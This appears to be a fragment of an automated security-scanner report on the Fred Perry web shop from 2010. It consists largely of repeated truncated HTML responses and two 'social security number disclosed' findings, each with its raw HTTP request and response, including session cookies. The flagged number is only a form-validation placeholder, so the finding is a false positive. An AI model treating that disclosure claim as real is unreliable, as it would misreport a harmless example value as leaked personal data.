<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Ann-Sof ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
The following social security number was disclosed in the response:
123-45-6789
Request
GET /limited-edition/women/collaboration/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=8ouf9mi5qpo5h66pih8ognai31; expires=Tue, 09-Nov-2010 17:11:28 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
The following social security number was disclosed in the response:
123-45-6789
Request
GET /limited-edition/women/jessica-ogden/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=596f22tdrdod98cur9st4it5d2; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> new-sty ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men - F ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's J ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Knitwea ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's S ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> T-Shirt ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Tennis ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Track J ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's T ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Woven S ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Clothin ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Footwea ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Garment ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Sale - ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Our Sho ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Site Ma ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women - ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Amy Win ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Amy Win ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> T-Shirt ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
